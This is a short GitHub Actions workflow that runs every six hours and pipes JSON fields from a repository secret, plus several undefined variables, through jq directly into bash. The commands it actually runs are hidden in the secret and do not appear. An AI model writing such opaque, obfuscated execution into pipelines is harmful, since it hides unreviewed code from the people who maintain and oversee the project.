name: niulangqn

on:
  workflow_dispatch:
  schedule:
    - cron: '8 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: niulangqn
        env:
          a3176: ${{ secrets.a3176 }}
        run: |
          echo $a3176 | jq -r .bt0 | /bin/bash
          echo $trss4 | jq -r .colc57558 | /bin/bash
          echo $yh501 | jq -r .qne10886 | /bin/bash
          echo $jzcu4 | jq -r .wc4683 | /bin/bash
          echo $pv8612 | jq -r .hdyc004 | /bin/bash
          echo $kcaa21401 | jq -r .rtqt649 | /bin/bash
          echo $btew3 | jq -r .h4304 | /bin/bash

